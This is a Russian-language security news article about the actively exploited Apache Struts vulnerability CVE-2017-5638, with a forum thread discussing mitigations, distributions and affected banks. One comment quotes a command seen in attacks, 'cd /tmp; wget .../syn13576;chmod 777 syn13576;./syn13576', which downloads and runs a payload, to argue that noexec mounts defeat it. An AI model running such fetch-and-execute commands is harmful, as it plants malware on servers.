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09.03.2017 11:04  Волна взломов сайтов через неисправленную уязвимость в Apache Struts

Опубликовано экстренное обновление web-фреймворка Apache Struts (2.3.32 и 2.5.10.1), применяемого для создания web-приложений на языке Java с использованием парадигмы Model-View-Controller. В новых выпусках устранена критическая 0-day уязвимость (CVE-2017-5638), которая уже несколько дней используется злоумышленниками для получения контроля за сайтами, работающими под управлением Apache Struts.

Уязвимость позволяет выполнить произвольный код на сервере, отправив запрос со специально оформленным содержимым HTTP-заголовка "Content-Type". Проблема проявляется в выпусках Struts с 2.3.5 по 2.3.31 и с 2.5.0 по 2.5.10, и вызвана ошибкой в коде Multipart parser, применяемом для разбора запросов, состоящих из нескольких частей (multipart/form-data). В случае, если заголовок Content-Type содержит некорректное значение, срабатывает исключение для отображения сообщения об ошибке, которое, если в тексте присутствует маска "multipart/form-data", также приводит к вызову обработчика Multipart parser и выполнению произвольного кода, передаваемого через выражение OGNL.

Так как в открытом доступе опубликовано несколько вариантов рабочих эксплоитов и в сети уже зафиксирована автоматизированная вредоносная активность, эксплуатирующая данную уязвимость, всем пользователям Apache Struts рекомендуется в экстренном порядке выполнить обновление или блокировать работу компонента Jakarta Multipart parser, а также убедиться в отсутствии следов атаки на систему. Обновления пакетов с libstruts уже выпущено для Debian. В Ubuntu проблема остаётся неисправленной. В штатных репозиториях RHEL/Cent OS пакет Apache Struts не поставляется.

В случае если web-приложение выполняется в контейнере Apache Tomcat, запускаемом с правами root, в результате атаки сразу может быть получен root-доступ к системе. Например, фиксируемые в логах попытки атак выполняют отключение пакетного фильтра и устанавливают бэкдор для удалённого управления системой или типовое вредоносное ПО:



  1. Главная ссылка к новости (http://blog.talosintelligence....)
  2. OpenNews: Опасная уязвимость в Apache Tomcat
  3. OpenNews: Уязвимость в устаревших выпусках Apache Tomcat, которая может привести к выполнению кода на сервере
  4. OpenNews: Зафиксирован самораспространяющийся червь, поражающий серверы Apache Tomcat
  5. OpenNews: В Apache Struts 2.0.12 исправлены две серьезные уязвимости
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: apache, struts
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  • 1.1, Аноним, 11:47, 09/03/2017 [ответить] [смотреть все]
    		• +/
    Стратс уже сто лет в полусдохшем состоянии и никому не нужен.
     
     
  • 2.3, Аанон, 11:49, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]
    		• +11 +/
    Никому, кроме всех тех, кому он нужен.
     
  • 1.4, Аноним, 11:56, 09/03/2017 [ответить] [смотреть все]
    		• +5 +/
    С учётом того, что сайты на Java Struts очень любят делать банки и госучреждения... весь текст скрыт [показать]
     
  • 1.5, Аноним, 12:11, 09/03/2017 [ответить] [смотреть все]  
    		• +5 +/
    Если у вас томкат за нжинксом, можете быстро сделать if http_content_type m... весь текст скрыт [показать]
     
  • 1.6, Michael Shigorin, 12:13, 09/03/2017 [ответить] [смотреть все]  
    		• –2 +/
    Интересно, успел ли кто эту беду сбэкпортировать в EOL'нутый 1.3.10, который по всем https://pkgs.org/download/struts ...
     
  • 1.7, vantoo, 12:42, 09/03/2017 [ответить] [смотреть все]  
    		• –1 +/
    Кого вообще интересуют эти Debian и RHEL/Cent OS? Кто ими вообще пользуется?
    Подскажите лучше, как дела с обновлением в Alt Linux?
     
     
  • 2.10, Michael Shigorin, 13:15, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
    		• –7 +/
    За полчаса до Вашего вопроса сообщением выше был написан ответ ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.11, vantoo, 13:22, 09/03/2017 [^] [ответить] [смотреть все]  
    		• +5 +/
    Хотелось бы более конкретного и ясного ответа. Ведь миллионы серверов под Alt Linux могут быть в опасности.
     
     
  • 4.15, Аноним, 13:54, 09/03/2017 [^] [ответить] [смотреть все]  
    		• +1 +/
    какие еще миллионы серверов под Alt Linux?
     
     
  • 5.20, Аноним, 15:18, 09/03/2017 [^] [ответить] [смотреть все]  
    		• +3 +/
    a вы что - не в курсе?!
     
  • 4.27, _, 20:18, 09/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Зависть :-) Ну сходи в шаровары, пусть альтовская уборщица страдает :)))))
     
  • 1.12, iZEN, 13:26, 09/03/2017 [ответить] [смотреть все]  
    		• +/
    Судя по командам, эксплуатируемым эксплоитами, все они предназначены для управления дистрибутивами линуксов, но не FreeBSD.
     
     
  • 2.14, Аноним, 13:38, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
    		• +/
    Что лишний раз подтверждает большую распространённость FreeBSD на серверах ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.22, Аноним, 15:43, 09/03/2017 [^] [ответить] [смотреть все]  
    		• +6 +/
    > Что лишний раз подтверждает большую распространённость FreeBSD на серверах.

    Вот и гордые надуватели щёчек набежали.
    Может, все дело в том, что бздюки, в отличие от некоторых излишне пафосных лапчатых, слышали о нормальных дефолтах и у них есть такие замечательные штуки, как монтирование с nonexec?
    https://www.freebsd.org/cgi/man.cgi?mount(8)
    Так что
    [code]
    cd /tmp; wget .../syn13576;chmod 777 syn13576;./syn13576
    [/code]
    можно делать хоть до посинения.
    А еще, для апачей и прочих дыроколов есть такая вещь, как клетки. Это типа контейнера, только без той кучи дыр и оговорок, что "контейнеры вообще-то не для безопасности!".
    Так что обтек… завидуйте молча.

     
     
  • 4.24, Sw00p aka Jerom, 16:13, 09/03/2017 [^] [ответить] [смотреть все]  
    		• +4 +/
    В клетках практически всё под ro, а для нужд ПО рабочую директорию под nonexec,nosymfollow и тд, не говоря уже об урезанном мире самой клетки.
     
  • 2.16, Аноним, 14:17, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
    		• +3 +/
    Но ведь на жаве, это главное, разве нет?
     
  • 1.17, Аноним, 15:03, 09/03/2017 [ответить] [смотреть все]  
    		• +/
    Сбер напрягся.
     
     
  • 2.23, Анон2, 16:09, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
    		• +/
    Сбер в пятницу чуть у матери 27к кому-то не перевел. Но в сбере всем как бы ложить.
     
  • 2.25, Аноним, 17:47, 09/03/2017 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
    		• +/
    У Сбера блокчейн, не трогайте его.
     
     
  • 3.26, Гостище, 18:22, 09/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    У кого-то в сбере блокчейн. В академических целях, не коммерческих.
    У остальных в сбере низзя - а то посодють.
     

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